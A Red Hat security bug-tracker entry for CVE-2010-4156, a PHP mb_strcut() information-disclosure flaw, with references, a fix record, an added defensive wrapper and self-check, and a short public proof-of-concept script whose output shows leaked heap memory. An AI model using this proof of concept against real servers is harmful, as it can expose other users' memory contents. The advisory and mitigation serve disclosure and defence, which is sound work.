Bug 651682 (CVE-2010-4156)

Summary: CVE-2010-4156 php information disclosure via mb_strcut()
Product: [Other] Security Response
Reporter: Huzaifa S. Sidhpurwala <huzaifas>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
Severity: medium
Priority: medium
Version: unspecified
CC: fedora, jorton, rpm, vdanen
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Doc Type: Bug Fix
Last Closed: 2011-02-04 09:11:38 UTC
Bug Depends On: 649186, 670439, 670463, 670464

Description Huzaifa S. Sidhpurwala 2010-11-10 04:51:48 UTC
An information disclosure flaw was found in the PHP mb_strcut() function.

mb_strcut() returns garbage when the following conditions are met:
1. The value specified to the length parameter exceeds the length of the subject string.
2. mbstring.internal_encoding is set to some single-byte encoding.

The garbage may consist of uncleared part of the heap that has previously been 
used for some purpose, which could lead to unexpected information exposure.
This only affects PHP 5.3 and above.

This bug was originally reported to php upstream by Mateusz Kocielski.

Common Vulnerabilities and Exposures assigned an identifier CVE-2010-4156 to
the above vulnerability.

Upstream bugs:
http://bugs.php.net/bug.php?id=53273
http://bugs.php.net/bug.php?id=49354

Upstream patch:
http://svn.php.net/viewvc/?view=revision&revision=305214

References:
http://www.mandriva.com/en/security/advisories?name=MDVSA-2010:225
http://www.securityfocus.com/bid/44727
http://secunia.com/advisories/42135
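The over-read described above, seen from the defender's side: a wrapper that clamps the length argument so mb_strcut() can never be asked for more bytes than the subject string holds, plus a self-check that tells an affected build from a fixed one. This is an added example, not code from the bug report or from PHP upstream; the names safe_mb_strcut and mb_strcut_overreads are this example's own, and the sample input is constructed.

```php
<?php
// Added example (not from the bug report or PHP upstream); written to be
// PHP 5.3 compatible so it can run on the builds the report concerns.

// Clamp $length to the bytes actually remaining after $start.
// mb_strcut() works on byte offsets, so strlen() (bytes) is the right bound.
function safe_mb_strcut($str, $start, $length = null, $encoding = null)
{
    $byteLen = strlen($str);
    if ($start < 0) {
        $start = max(0, $byteLen + $start);
    }
    if ($start >= $byteLen) {
        return '';
    }
    $remaining = $byteLen - $start;
    if ($length === null) {
        $length = $remaining;
    }
    // Negative or oversized lengths are clamped into [0, $remaining].
    $length = max(0, min((int) $length, $remaining));
    if ($encoding === null) {
        $encoding = mb_internal_encoding();
    }
    return mb_strcut($str, $start, $length, $encoding);
}

// Self-check: on an affected build (PHP 5.3.0-5.3.3, single-byte internal
// encoding) mb_strcut() with an oversized length returns more bytes than the
// subject string, i.e. uncleared heap. A fixed build returns at most strlen().
function mb_strcut_overreads()
{
    $saved = mb_internal_encoding();
    mb_internal_encoding('ISO-8859-1');   // single-byte encoding, condition 2 above
    $subject = 'bbbbbbbbbbb';             // constructed sample input, 11 bytes
    $out = mb_strcut($subject, 0, 1000);  // length far beyond strlen($subject)
    mb_internal_encoding($saved);
    return strlen($out) > strlen($subject);
}

if (PHP_SAPI === 'cli') {
    echo mb_strcut_overreads()
        ? "mb_strcut() over-reads past the subject string: update PHP\n"
        : "mb_strcut() output is bounded: OK\n";
    // The wrapper is bounded on any build, fixed or not.
    var_dump(safe_mb_strcut('bbbbbbbbbbb', 0, 1000) === 'bbbbbbbbbbb');
}
```

The self-check only reports whether the installed build over-reads; the wrapper is the mitigation to apply to code that passes untrusted or oversized lengths to mb_strcut() until the package is updated.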

Comment 1 Huzaifa S. Sidhpurwala 2010-11-10 04:57:17 UTC
Public PoC:

Test script:
---------------
<?php
// Subject string: 11 bytes; a correct mb_strcut() can return at most this much.
$b = "bbbbbbbbbbb";
// The result is unused; the call only places a recognisable string on the heap.
str_repeat("THIS IS A SECRET MESSAGE, ISN'T IT?", 1);
// length (1000) far exceeds strlen($b); with a single-byte
// mbstring.internal_encoding, affected builds copy past the end of $b.
$var3 = mb_strcut($b, 0, 1000);
echo $var3;
?>


Expected result:
----------------
bbbbbbbbbbb

Actual result:
--------------
bbbbbbbbbbb??????D$Ј=m???=m?(?=m?`?=m??5<m??=m?THIS IS A SECRET MESSAGE, ISN'T 
IT??g?1@?=m?(?=m???=m?p?=m?var3

Comment 2 Huzaifa S. Sidhpurwala 2010-11-10 05:20:37 UTC
Created php tracking bugs for this issue

Affects: fedora-all [bug 649186]

Comment 4 Vincent Danen 2010-11-10 06:28:45 UTC
Common Vulnerabilities and Exposures assigned an identifier CVE-2010-4156 to
the following vulnerability:

Name: CVE-2010-4156
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4156
Assigned: 20101104
Reference: MLIST:[oss-security] 20101107 CVE Request: PHP 5.3.3, libmbfl, mb_strcut
Reference: URL: http://www.openwall.com/lists/oss-security/2010/11/07/2
Reference: MLIST:[oss-security] 20101108 Re: CVE Request: PHP 5.3.3, libmbfl, mb_strcut
Reference: URL: http://www.openwall.com/lists/oss-security/2010/11/08/13
Reference: MISC: http://pastie.org/1279428
Reference: MISC: http://pastie.org/1279682
Reference: BID:44727
Reference: URL: http://www.securityfocus.com/bid/44727
Reference: SECUNIA:42135
Reference: URL: http://secunia.com/advisories/42135

The mb_strcut function in Libmbfl 1.1.0, as used in PHP 5.3.x through
5.3.3, allows context-dependent attackers to obtain potentially
sensitive information via a large value of the third parameter (aka
the length parameter).

Comment 6 Tomas Hoger 2011-01-18 13:10:31 UTC
It seems this issue got introduced in the update of bundled libmbfl that happened between 5.3.2 and 5.3.3:

  http://svn.php.net/viewvc?view=revision&revision=296101

Comment 9 errata-xmlrpc 2011-02-03 19:17:08 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 5

Via RHSA-2011:0196 https://rhn.redhat.com/errata/RHSA-2011-0196.html

Comment 10 Vincent Danen 2011-02-03 19:34:45 UTC
Statement:

This issue did not affect the version of php packages as shipped with Red Hat Enterprise Linux 4, 5 or 6.  It did affect the PHP 5.3 (php53) package on Red Hat Enterprise Linux 5.